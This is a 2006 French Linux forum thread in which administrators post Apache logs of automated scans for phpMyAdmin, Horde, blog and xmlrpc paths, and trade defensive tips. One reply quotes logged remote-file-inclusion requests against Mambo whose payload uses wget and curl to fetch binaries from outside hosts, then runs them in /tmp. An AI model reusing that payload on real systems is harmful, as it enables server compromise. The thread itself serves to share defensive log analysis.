leon47 Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 au cours de mon analyse rituelle de fichier log, je me suis retrouvé devant une petite surprise ... des PC distant s'amusent à scanner le contenu de mon serveur web qui ne tourne que depuis 5 jours, qui bloque les pings et qui est placé derrières 2 routeurs piti 1, comment la personne m'a trouvée, s'amuse t'elle a scanner toutes les plages d'adresse ip ? piti 2, ca craint quand même d'utiliser les répertoires par défaut des logiciel d'amin !!! ==> les gens, si possible, utiliser un chemin différents, c'est plus mieux ^^ c'était ma pitite pierre aportée à la communauté :) [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/a1b2c3d4e5f6g7h8i9 [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] script '/var/www/adxmlrpc.php' not found or unable to stat [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/adserver [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpAdsNew [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpadsnew [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpads [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/Ads [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/ads [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] script '/var/www/xmlrpc.php' not found or unable to stat [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlrpc [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlsrv [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/drupal [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/community [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogtest [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2 [Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2evo [Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/wordpress [Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpgroupware [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/PMA [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/db [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/dbadmin [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/web [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpmyadmin2 [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysqladmin [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql-admin [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] script '/var/www/main.php' not found or unable to stat [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.6 [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.4 [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.1 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.3 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.6 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/myadmin [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0-pl1 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-pl1 [Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3 [Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-rc1 [Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.2-rc1 [Thu Jun 08 04:39:12 2006] [error] [client 80.96.96.121] File does not exist: /var/www/README [Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde [Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde2 [Thu Jun 08 04:39:14 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde3 [Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde-3.0.9 [Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/Horde Lien vers le commentaire Partager sur d’autres sites More sharing options...
uzak Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 Clair, ça craint. Pareil en ftp, des fois, des login et mot de passe un peu arbitraires Lien vers le commentaire Partager sur d’autres sites More sharing options...
lorinc Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 tu as un dyndns ? c'est peut-être quelqu'un qui scanne une plage de dyndns... Lien vers le commentaire Partager sur d’autres sites More sharing options...
leon47 Posté(e) le 8 juin 2006 Auteur Partager Posté(e) le 8 juin 2006 nananan, une bonne vieille ip fixe et un DNS tout ce qu'il y a de plus classique, mes routeurs n'autorise que le port 80 et 443, donc, la personne scan bien les adresse (ou ip, ce qui est le plus probable) pour trouver des sites qu'il pourra véroler Lien vers le commentaire Partager sur d’autres sites More sharing options...
tuXXX Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 au cours de mon analyse rituelle de fichier log, je me suis retrouvé devant une petite surprise ... des PC distant s'amusent à scanner le contenu de mon serveur web qui ne tourne que depuis 5 jours, qui bloque les pings et qui est placé derrières 2 routeurs piti 1, comment la personne m'a trouvée, s'amuse t'elle a scanner toutes les plages d'adresse ip ? piti 2, ca craint quand même d'utiliser les répertoires par défaut des logiciel d'amin !!! Cacher un serveur (au ping notamment, mais aussi en ne mettant aucun DNS, etc...) n'a jamais changé quoi que ce soit pour ce qui est de la protection. Vu l'activité sur internet, il y aura toujours quelque chose (virus, vers, hacker, etc...) qui découvrira le serveur quelles que soient les condition... Mettre d'autres ports que les ports par défaut peut aider, mais c'est pareil un jour ou l'autre ça se trouvera. Une vraie politique de sécurité est donc importante. Lien vers le commentaire Partager sur d’autres sites More sharing options...
lorinc Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 tant que ce n'est pas pour tout détruire, ma foi... évidement, je doute sérieusement sur ces intention, mais sait-on jamais Lien vers le commentaire Partager sur d’autres sites More sharing options...
16ar Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 au cours de mon analyse rituelle de fichier log, je me suis retrouvé devant une petite surprise ... des PC distant s'amusent à scanner le contenu de mon serveur web qui ne tourne que depuis 5 jours, qui bloque les pings et qui est placé derrières 2 routeurs piti 1, comment la personne m'a trouvée, s'amuse t'elle a scanner toutes les plages d'adresse ip ? piti 2, ca craint quand même d'utiliser les répertoires par défaut des logiciel d'amin !!! ==> les gens, si possible, utiliser un chemin différents, c'est plus mieux ^^ c'était ma pitite pierre aportée à la communauté :) [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/a1b2c3d4e5f6g7h8i9 [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] script '/var/www/adxmlrpc.php' not found or unable to stat [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/adserver [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpAdsNew [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpadsnew [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpads [Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/Ads [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/ads [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] script '/var/www/xmlrpc.php' not found or unable to stat [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlrpc [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlsrv [Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/drupal [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/community [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogtest [Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2 [Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2evo [Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/wordpress [Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpgroupware [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/PMA [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/db [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/dbadmin [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/web [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpmyadmin2 [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysqladmin [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql-admin [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] script '/var/www/main.php' not found or unable to stat [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.6 [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.4 [Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.1 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.3 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.6 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/myadmin [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0-pl1 [Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-pl1 [Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3 [Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-rc1 [Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.2-rc1 [Thu Jun 08 04:39:12 2006] [error] [client 80.96.96.121] File does not exist: /var/www/README [Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde [Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde2 [Thu Jun 08 04:39:14 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde3 [Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde-3.0.9 [Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/Horde j'avais deja des attaques de ce genre, mais dernierement ca vise plus singulierement xmlrpc 130.227.55.243 - - [02/Jun/2006:05:50:20 +0200] "POST /xmlrpc.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:21 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:22 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:23 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:24 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:26 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:27 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:28 +0200] "POST /xmlrpc.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:29 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:30 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:31 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:32 +0200] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 130.227.55.243 - - [02/Jun/2006:05:50:33 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Lien vers le commentaire Partager sur d’autres sites More sharing options...
Poulpatine Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 J'ai aussi eu du xmlrpc ( drupal, wordpress, phpgroupware ) dans mes logs. Faut pas chercher, ce sont des types qui bourrinent. On va pas se plaindre, on a droit à un mini audit de sécu gratuitement. Lien vers le commentaire Partager sur d’autres sites More sharing options...
theocrite Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 xmlrcp et phpbb... On ne change pas les équipes qui gagnent Lien vers le commentaire Partager sur d’autres sites More sharing options...
Sandeman Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 et si ça te gonfle : www.ripe.net tu tape/ cut'n'paste "83.138.146.85" dans la zone recherche .../... inetnum: 83.138.128.0 - 83.138.191.255 netname: UK-RACKSPACE-20040816 descr: PROVIDER Local Registry descr: Rackspace.com country: GB org: ORG-RA33-RIPE admin-c: DB1452-RIPE tech-c: DB1452-RIPE tech-c: RMHC1-RIPE status: ALLOCATED PA "status:" definitions mnt-by: RIPE-NCC-HM-MNT mnt-lower: RSPC-MNT mnt-routes: RSPC-MNT mnt-domains: RSPC-MNT source: RIPE # Filtered .../... remarks: ### Rackspace Abuse Department remarks: ### Please send any complaints to the following: remarks: ### abuse@rackspace.com .../... Lien vers le commentaire Partager sur d’autres sites More sharing options...
ggbce Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 C'est la même chose pour moi. J'ai plusieurs site avec des adresses IP fixe (et dans certains cas de "nouvelles" adresses qui n'on jamais eu de serveur Linux installé). J'ai installé un serveur de test dernièrement... pas même 2 jours après l'installation tu aurais du voir le nombre de requêtes pour une connexion SSH, SMTP et HTTP !!! Y'a vraiment des gars qui se font payer pour scanner l'Internet ! D'après toi comment font les gars qui font du SPAM ou un serveur IRC ou encore Kazaa (via Squid-cache), ils se trouvent une belle porte ouverte... et Hop ! C'est pratiquement inpensable d'installer un poste directement sur Internet (ou derrière un router comme toi avec les ports ouverts pour tes services) sans croire que personne n'essaiera pas d'y accéder ! Un jour, en analysant mes rapports Log de Apache, je suis tombé sur une adresse provenant du "Christmas Island" !!!! Pas croyable non... Ce pays un une petite île en Asie d'environ 10 000 habitants... ben y'a au moins un gars de là qui à trouvé mon site et s'est essayé. Aujourd'hui, avant même de brancher ton câble réseau après une installation, faut penser à 2 fois si tout a été sécurisé. Lien vers le commentaire Partager sur d’autres sites More sharing options...
theocrite Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 Faut pas abuser non plus hein... On est plus sous windows. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Sufflope Posté(e) le 8 juin 2006 Partager Posté(e) le 8 juin 2006 Et puis croyez pas que c'est UN gars qui s'est dit "tiens je vais attaquer celui-là en France", c'est des pc zombies win32 qui scannent des plages d'IP... Lien vers le commentaire Partager sur d’autres sites More sharing options...
zoto Posté(e) le 9 juin 2006 Partager Posté(e) le 9 juin 2006 Salut C'est souvent des mec qui utilise 2/3 soft de scan pour choper des victime . a+ Lien vers le commentaire Partager sur d’autres sites More sharing options...
Poulpatine Posté(e) le 9 juin 2006 Partager Posté(e) le 9 juin 2006 Je me souviens d'avoir scanné plusieurs milliers de ftp en une nuit. 2 jours après j'ai reçu un joli mail de abuse@mamadoo.fr qui me disait "pas bien" Lien vers le commentaire Partager sur d’autres sites More sharing options...
ggbce Posté(e) le 9 juin 2006 Partager Posté(e) le 9 juin 2006 C'est exactement ça, comme Poulpatine a fait... mais certains font ce genre de scanne... et ils vont plus loin s'ils trouvent une faille de sécurité. Si la porte est ouverte ils peuvent (tout dépendant de la faille): envoyer virus abuser de la connexion accéder aux données, donc en détruire ... Et dire qu'il n'existe pas de faille dans Linux c'est faux... car toutes les failles sont "humaines". Si tu configures mal un logiciel tu peux ouvrir la porte en même temps. Ça m'a déjà arrivé d'être pris avec un "rootkit" dans le passé. J'avoue que par contre les nouvelles distributions sont de plus en plus sécuritaire du fait que par défaut ils activent des règles de "non-permission". Lien vers le commentaire Partager sur d’autres sites More sharing options...
nofun Posté(e) le 9 juin 2006 Partager Posté(e) le 9 juin 2006 Et puis croyez pas que c'est UN gars qui s'est dit "tiens je vais attaquer celui-là en France", c'est des pc zombies win32 qui scannent des plages d'IP... ou des *nix très mal administrés (disons plutôt pas du tout administrés) : j'avais des scans ssh avec des trucs du genre login: root pswd: root, login: admin, login: steve... (plusieurs dizaines voire quelques centaines d'essais). J'ai fait quelques recherches sur les machines d'origine de ces scans, et j'ai trouvé par exemple des machines *nix appartenant à des gouvernements ! Je suppose qu'elles avaient un mot de passe trivial. Depuis j'ai mis ssh sur un port haut, au moins ça soulage les logs. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Maxime0810 Posté(e) le 9 juin 2006 Partager Posté(e) le 9 juin 2006 j'avais des scans ssh avec des trucs du genre login: root pswd: root, login: admin, login: steve... (plusieurs dizaines voire quelques centaines d'essais). J'ai fait quelques recherches sur les machines d'origine de ces scans, et j'ai trouvé par exemple des machines *nix appartenant à des gouvernements ! Je suppose qu'elles avaient un mot de passe trivial. Depuis j'ai mis ssh sur un port haut, au moins ça soulage les logs. J'ai les mêmes... C'est pas bête, je vais changer le port de ssh, parce que ça pourrit sérieusement mes logs. Lien vers le commentaire Partager sur d’autres sites More sharing options...
sevni Posté(e) le 9 juin 2006 Partager Posté(e) le 9 juin 2006 Salut a tous, On peut savoir sur quels ports tu as ces scans principalement STP ? Chez moi c'est surtout sur du 445,135,138,137,139,1025,1026,1027,1028,1029,...... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.